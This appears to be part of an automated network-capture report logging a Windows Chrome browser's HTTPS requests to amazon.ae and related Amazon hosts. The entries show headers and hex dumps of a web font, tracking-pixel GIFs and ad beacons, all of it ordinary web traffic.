                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000099-IAD, cache-ewr-kewr1740069-EWR
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 77 4f 46 32 00 01 00 00 00 00 40 e8 00 10 00 00 00 00 af 6c 00 00 40 82 00 01 02 8f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 38 1b df 7a 1c 97 40 06 60 00 85 7e 11 08 0a 81 a1 50 81 84 39 01 36 02 24 03 8e 46 0b 87 3c 00 04 20 05 89 2c 07 9b 61 3f 77 65 62 66 06 1b ff 9b 35 6c 9b 46 cd ee 56 55 05 00 23 37 1b 51 83 ee e0 64 fd a1 8a 18 15 e5 94 8d 6b f6 ff 9f 72 a0 86 8c f1 b8 7b d8 54 b5 aa 82 14 32 4b 75 49 09 31 a5 2b 6a ca aa a4 84 28 ef 07 6b 76 66 38 af 8c 11 37 83 2b bf 26 00 ab ae 86 b0 74 85 1f 21 5a 1c 96 43 1c 96 ea 3e a3 05 3d ec f4 9e 0b f4 76 18 39 5f 15 25 20 a0 4c c2 19 02 c1 c2 7a b0 e5 f5 a4 97 07 ec c3 9d be ef 85 95 30 1f 65 84 19 bf e5 3b e8 37 3e ff 64 bb fe 53 ff e3 9d 9e 5b 9f cd a7 26 2f 1a
                                                                                                                                                                                                                                                                      Data Ascii: wOF2@l@?FFTM8z@`~P96$F< ,a?webf5lFVU#7Qdkr{T2KuI1+j(kvf87+&t!ZC>=v9_% Lz0e;7>dS[&/
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 46 2a 28 cf 88 2a 3c 5b c4 b9 df 46 e9 b2 05 56 71 91 0c cb 09 9e 7a f7 71 e2 58 a4 4c f3 f1 7b d8 49 de e2 1b 27 b9 0e a3 14 5b 96 24 a3 78 81 c7 67 a2 1c 57 62 24 48 91 46 a2 eb a0 d3 ce bb e8 92 cb ae b8 c6 85 27 3f a1 22 c4 db 20 5d 96 9f 7e f9 e3 8e 51 e3 e6 7c 87 25 40 f3 3f bc 18 62 a4 1b 33 bd f4 b3 ce 26 bb d8 71 f2 cb bf c0 82 0a 2e b4 b8 36 b6 a9 b4 b2 3a 58 4e b9 e5 75 a9 fa 1a 6a aa ad ab 81 75 fd b0 63 2c 05 e8 7f 1d ca a9 83 a6 af 64 39 82 02 43 d3 cb 30 6d a0 09 b0 66 5e 2f d2 7a 56 00 7e a7 2f 20 00 a6 08 c4 b0 09 12 08 a2 08 15 32 45 ea 6b 84 4d cc 72 18 a9 ef 6b 0c c0 18 18 64 74 78 4c 77 f9 8d 68 d2 bf 8c 48 0c b9 56 15 5b 88 b7 0e 27 01 09 ec 4a e9 e4 b2 fe 68 05 48 4d 3b 05 a1 5a 22 12 70 35 8d be fd 2c 13 4c 1a 44 06 a8 e6 62 84 25
                                                                                                                                                                                                                                                                      Data Ascii: F*(*<[FVqzqXL{I'[$xgWb$HF'?" ]~Q|%@?b3&q.6:XNujuc,d9C0mf^/zV~/ 2EkMrkdtxLwhHV['JhHM;Z"p5,LDb%
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 32 c4 8b 95 89 8d 6e 80 ee 04 46 94 04 1c 4e 62 30 f8 3c 6e 09 d3 56 82 04 74 5e 4a 89 11 30 04 c1 86 3b 40 41 13 4d fb a8 b0 d7 f9 69 06 94 d1 74 44 b5 42 68 56 87 ae b4 92 31 35 0f 98 9c 82 64 a6 34 20 e0 21 79 72 cd fb cc 19 2d 81 f7 22 63 27 a6 da 2a c5 b9 80 01 fa b4 60 5e b5 40 e4 5f f0 03 dc 90 90 5d 5b da 12 ed 7e f1 1c 0c 06 27 0a b8 22 ae df 11 dd 23 8a 33 b3 a1 23 01 04 99 5f 81 92 1a 22 6f a5 e2 c4 2c 77 33 57 44 f0 54 9e c0 8d 82 3a 4a 9a ac 2a de ac 09 fb 6d 2d a2 a5 7e d0 5a f0 75 dc 3e 28 ce cc e8 41 28 50 3b 33 1b 51 36 6d ed a8 2f 1a 37 22 e2 07 49 02 f9 01 65 7d b6 c5 36 c1 a6 09 2d 59 59 77 4e 26 c9 04 91 40 17 d0 62 da d2 ee 2b 46 d5 c6 de 93 82 03 96 90 ce cc 1a af 12 69 a5 5c 3b 36 10 ab 64 a1 1a 2c 55 04 cd 70 ff dd 40 19 27 60 29
                                                                                                                                                                                                                                                                      Data Ascii: 2nFNb0<nVt^J0;@AMitDBhV15d4 !yr-"c'*`^@_][~'"#3#_"o,w3WDT:J*m-~Zu>(A(P;3Q6m/7"Ie}6-YYwN&@b+Fi\;6d,Up@'`)
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: fb 2f 48 a2 7a 54 b4 b3 c5 03 12 dc 75 01 1f d8 ba 14 bb 3e 72 50 f7 f1 cc 23 d3 09 8a d9 d1 ab 37 37 12 75 a0 4e 3d 29 ce 7f fc 90 57 9f d8 ec 6e 00 ad 49 7b 93 80 1b 3b 02 0d 5e d0 bd a3 cd d5 02 c0 c0 e0 a1 24 85 86 bf 22 0a 3c fa be 0c 16 e6 96 00 e1 26 11 50 66 0d bd 65 a2 24 a2 ed 69 94 bb ae b1 0d 0a d2 52 f0 79 b5 e6 05 2c 24 d9 9f 13 21 87 c9 84 0d 67 1e 7c 04 88 90 20 c9 1e 19 04 4a 1d 72 dc 79 8d ae e9 d6 43 21 9e e1 95 f9 13 07 03 a1 24 1b ad a2 40 ea 0b 4d 7e 10 05 d2 8c 1c 55 37 e3 73 e4 a3 db fc 8a 9b b3 ca 28 1d 75 f3 cd d0 1c 4e c8 3d 0f a3 8f 5c 9f f9 79 1f 5d 93 f5 be d1 de 75 06 b5 9d d6 ee 38 84 7c 23 6f 4c 46 a1 f3 cd 47 3d fa cd 21 22 5e d5 67 8a 88 c6 09 82 a4 c2 10 e1 d3 57 4f fd df c4 db c2 47 2b ed 18 e9 c2 10 60 02 81 9d 80 ca
                                                                                                                                                                                                                                                                      Data Ascii: /HzTu>rP#77uN=)WnI{;^$"<&Pfe$iRy,$!g| JryC!$@M~U7s(uN=\y]u8|#oLFG=!"^gWOG+`
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: de a0 f4 e0 b1 08 38 d1 68 09 20 02 bf 18 5c a2 9a 7c 40 72 0a c0 27 11 c9 47 f2 22 93 47 d5 b8 6a a9 4d 8d aa 4f fb a0 07 2a 74 28 55 23 4d d5 64 8a 09 aa 9a f0 02 07 ac e9 c8 fc 94 cc c0 1a 4a b0 31 78 be f6 c1 6a e9 7b 2c 50 1f ce 3c c5 af c8 a0 8a cc 54 61 6b 50 f6 94 0d d5 25 50 f4 b2 3e 19 67 a8 09 09 d3 ca aa cd c2 c6 3a 59 79 10 0a bc 1c 02 52 2d ac 1d 27 b1 5e 2c ec 41 8f 2d 63 26 17 59 2f 88 3e a5 b5 e9 b8 8f a5 86 22 c0 aa a4 be d2 14 8d 72 7e f9 7d 2e 59 3a d2 f7 e5 bc f2 0a 63 e6 6a d3 c1 c3 96 79 cb ce 3a a6 65 04 c8 cb 74 bc 5e 61 27 d2 36 e7 7d be 90 8a 5e da cb 29 2d 50 8c e8 7d 65 a0 6a 25 74 9d 61 52 ee b8 96 bc 11 5a 2e ea 34 38 43 06 3b 5b 93 89 c9 c1 bc dd 32 27 0a 2e bb 8f 03 33 f5 dc d1 b9 9f 38 9b b3 c2 6f 43 da 39 ad a0 45 13 f2
                                                                                                                                                                                                                                                                      Data Ascii: 8h \|@r'G"GjMO*t(U#MdJ1xj{,P<TakP%P>g:YyR-'^,A-c&Y/>"r~}.Y:cjy:et^a'6}^)-P}ej%taRZ.48C;[2'.38oC9E
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 31 03 68 25 0f 84 e4 71 20 e4 d3 34 83 ec f8 9e f8 15 90 a1 d8 fe 43 dd 38 3c 8e d8 01 3a a5 37 ba 28 39 31 ee fb 68 64 79 34 0c cd bd de 42 86 7d 35 4e 91 a0 a7 3c 7f f4 45 b6 e9 2f 82 6c 8f 1c 8a 23 d0 fd e4 00 83 6b 32 62 2e 62 aa 36 79 17 88 97 48 7d 4b c0 75 5f 25 6e eb 58 7b d2 25 c1 58 be a8 6a da 7d 35 1a 28 cd e0 c5 e1 41 3c b5 17 3e f9 f3 79 b3 f9 8f 91 96 ee f5 c1 54 1d f9 ed f8 f1 a1 2e a4 fb 4c 7d 83 67 a4 10 c0 93 ec ed bb 7f 87 ad 40 06 ca ce a2 5a 40 b4 61 2a a7 3c 48 ce 7c a9 f5 a2 bb be 87 db 41 b5 1e ba 8c 91 d4 a7 44 14 c1 e7 5e 19 c7 c7 45 b9 69 c8 83 56 d0 85 f8 3d d0 09 fe a2 1e a4 da 57 7e ed fa f9 ca 85 fc 89 5b 17 6e dd 95 f5 5b 70 fb ac f1 76 9b 26 b2 3c 40 d6 64 1b e5 4c 6f 4d bd 0d 13 b1 b9 3f e8 3b e5 f4 8a 31 44 13 6d 5f 5d
                                                                                                                                                                                                                                                                      Data Ascii: 1h%q 4C8<:7(91hdy4B}5N<E/l#k2b.b6yH}Ku_%nX{%Xj}5(A<>yT.L}g@Z@a*<H|AD^EiV=W~[n[pv&<@dLoM?;1Dm_]
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: e4 75 c7 2b 4e b5 73 87 e5 2b c5 37 72 b0 ca df 90 81 2a 30 91 00 91 f3 6a b8 96 08 88 9c 5f af 21 ad b9 bb a1 b0 ae 2b e4 76 4d 75 b6 7a 0d 39 c0 1c 72 38 86 97 8c a5 98 53 0a 39 36 5a a5 85 eb 1f e8 ad ed eb 3b 75 ea ea f6 e7 72 f2 b5 51 3f f3 56 2b 89 a8 7a a6 32 be 6c d9 f3 2a 9e 08 11 71 61 11 28 a5 b8 42 9a b7 d1 75 1e 58 5e 7d 96 6d 34 c9 d2 05 28 cb 34 ea 6f 6e 18 26 6a 38 22 a7 20 a5 b6 5c 51 51 d3 ee 73 39 3b 3d 2b a3 62 18 7a b6 82 8f c0 ca 6a 46 de a8 22 6d f2 1d bd a0 5d e5 9a 4a 35 53 c0 61 b3 fe 83 b5 3e 75 a6 d8 e1 6a 5b de 63 ad 27 17 3b 9b 5a 3c 42 86 3f 50 2d ee ea 3f 35 b3 b0 e3 b9 7c 42 90 ff b2 25 43 11 f3 1b 31 fb a1 92 0d ab 20 58 28 01 dc 72 ec f2 23 26 3c 9c 57 b2 80 e5 d1 ed 8f 8e 45 29 6a a8 c8 92 c5 7e ed ad 2e b1 1a dd 7a 25
                                                                                                                                                                                                                                                                      Data Ascii: u+Ns+7r*0j_!+vMuz9r8S96Z;urQ?V+z2l*qa(BuX^}m4(4on&j8" \QQs9;=+bzjF"m]J5Sa>uj[c';Z<B?P-?5|B%C1 X(r#&<WE)j~.z%
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: ae b4 cb 29 84 ec 10 77 40 fb dc a7 e4 c9 07 25 f7 ce 7a 82 4c f8 ab 7a 4a 8c c6 f4 87 02 36 dd 0e ac 73 13 7f 2a c6 d3 1a 72 09 81 1b d5 a0 e2 34 58 99 08 39 04 e4 7b 4f 95 29 c7 b9 a5 48 40 6b 20 24 59 b0 35 15 a3 67 01 ef ea c5 dc e2 4d d9 16 be 6d f5 ba 69 df 4d 3b 55 3b d3 b3 d6 32 f5 ba c0 a9 33 16 91 0b 91 a3 d2 10 a1 ae dc 5a 2c 91 94 6c 20 ee c0 fd c1 a5 b3 f8 70 3e 9f f0 3e f5 bf 77 9b c2 c1 b0 fb d8 ff 09 db 76 d4 ee 20 6a f7 b6 ee f5 9c fa 1f 36 f7 3f d6 fb 58 e0 d2 92 93 bf b6 ec b8 d0 7c c1 7f e2 d7 d6 08 f0 08 ff c2 ca c6 ab 07 c3 07 bd 5f 6b 49 22 09 9b 91 cf 41 8e a7 66 cd ae 03 74 1e d5 41 52 4d c8 b3 9d f9 2a 90 30 b9 8e ce d5 18 b0 cb d9 0f 98 71 aa b8 dc 07 8c cb 98 c6 20 a3 af 5b ed 9e 94 55 95 77 95 36 f6 e3 87 6c da d5 bc aa ac 24
                                                                                                                                                                                                                                                                      Data Ascii: )w@%zLzJ6s*r4X9{O)H@k $Y5gMmiM;U;23Z,l p>>wv j6?X|_kI"AftARM*0q [Uw6l$
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 82 4f f7 b0 9a 26 53 97 d4 11 74 73 85 cc 5c f5 2b 9a 87 76 2e e5 b6 e3 79 0f 33 38 9d c0 79 a5 9d 91 c5 5c 5f 87 34 8a 0d 1c 5f 47 de 0f f7 7e 93 4a af a1 bd e2 96 9d 49 ab aa 04 bc c0 7a e9 d1 b0 d1 05 37 55 e9 ec c7 34 e2 b7 22 d7 45 7e ef a6 39 66 d5 35 55 c1 f6 b0 4e 31 e3 6f 9a ac 0f 07 fc f5 9b c6 c7 eb a7 fc 81 8f 15 38 43 dc 65 11 2a 0d 6d 68 ec e3 00 ae de b5 46 91 9d b9 6b 97 83 29 b6 ba 03 04 cd 2d 5f a4 f3 55 eb 06 81 45 b4 31 e6 32 3a 79 7b 61 72 13 2f 98 3a 8d 0f cb 97 48 96 68 9c 3e f0 c1 ae 00 d9 f8 29 17 e5 9f ae 4d 16 e8 26 eb 1b db 2d 22 cb 08 61 af 18 d9 29 da 69 22 6d 08 58 c7 31 c3 bd a2 94 2b 95 70 46 9e 66 f3 de d7 b1 ea 2d e0 43 55 17 97 25 59 ec 39 d5 58 62 7c 69 9b 34 81 2b 0f d6 ec ff a8 3d 2d f4 e0 9a 20 d2 58 17 d0 73 d9 8e
                                                                                                                                                                                                                                                                      Data Ascii: O&Sts\+v.y38y\_4_G~JIz7U4"E~9f5UN1o8Ce*mhFk)-_UE12:y{ar/:Hh>)M&-"a)i"mX1+pFf-CU%Y9Xb|i4+=- Xs
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 62 e8 4e b1 e6 38 1a 8f 11 22 1c ab 3f 30 18 e2 1d 9f 03 59 cc 1a cd e8 f8 16 19 1c cd fa 1c f8 ff 1f 64 31 54 0c f2 bd 9a 55 42 4c 87 0c 78 05 32 40 0e 78 5b df ad 23 63 1d 15 d9 22 ba 8b 0b fa 0d 35 2e 66 79 8c d2 a0 a8 6f 92 fe f4 e2 e6 2b d7 a0 e4 e0 1b 0c 8c e8 92 bb b9 e4 1a 0f f2 30 df e3 09 cc 09 33 11 96 a9 fa c1 5d 03 f0 20 0f 63 42 8c b2 77 15 f0 20 0f 63 42 cd 63 94 2d 6a b1 b3 9b 4d 3c c8 c3 7c 0f 13 6a 17 c0 8d 04 0f f2 30 26 d4 d1 49 8c c5 fd e3 3b 11 c0 03 3c c4 23 3c 8e 59 f1 48 3a d2 52 6e 70 97 0c 1e e0 21 8c 17 3f 8b aa 75 e7 fb 57 7b c0 1e 92 71 5d 1f 9b 98 2b 7f 47 57 4b e3 01 1e e2 11 8c 6b 50 00 57 15 3c c0 43 18 97 b0 ec 80 65 8c 0b 43 c7 4a 32 67 0d a3 b9 99 a7 30 29 4c 1d 2c 5e f5 88 c3 95 26 1e e6 21 9e e1 69 7e 80 fb d0 5b 62
                                                                                                                                                                                                                                                                      Data Ascii: bN8"?0Yd1TUBLx2@x[#c"5.fyo+03] cBw cBc-jM<|j0&I;<#<YH:Rnp!?uW{q]+GWKkPW<CeCJ2g0)L,^&!i~[b


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      44192.168.2.54976134.251.147.1634432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC789OUTGET /1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DAPAVCQJMFK78QJEV1PMZ:0 HTTP/1.1
                                                                                                                                                                                                                                                                      Host: fls-eu.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC176INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      x-amzn-RequestId: 17fde846-e91d-479b-8d8d-34f789ba4d95
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      45192.168.2.54976852.95.121.1954432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC663OUTGET /e/xsp/imp?b=RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: aax-eu.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC323INHTTP/1.1 200
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      x-amz-rid: QQMYN983JESBQJC699SF
                                                                                                                                                                                                                                                                      Cache-Control: no-store, max-age=0
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      46192.168.2.54976952.95.121.1954432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC629OUTGET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/atf/%7B%22atf%22:true%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: aax-eu.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC330INHTTP/1.1 200
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      x-amz-rid: 53YM1NSXX4HB9K52ERDV
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      47192.168.2.54976752.95.121.1954432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC827OUTGET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:959.984375,%22v%22:%7B%22p%22:0,%22t%22:0,%22def%22:%22amzn%22%7D,%22ptv%22:1724264921.256,%22ttv%22:1724264921.256%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: aax-eu.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC330INHTTP/1.1 200
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      x-amz-rid: TQPGKVWM6CJ9TW5F0V21
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      48192.168.2.549771151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC621OUTGET /images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead- HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC687INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 23
                                                                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 0205a7df-c99a-46fe-827d-288fa624acf5
                                                                                                                                                                                                                                                                      Cache-Control: max-age=86400,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 28 Nov 2016 08:22:04 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Sat, 06 Apr 2024 04:36:34 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 35645
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200178-IAD, cache-ewr-kewr1740050-EWR
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
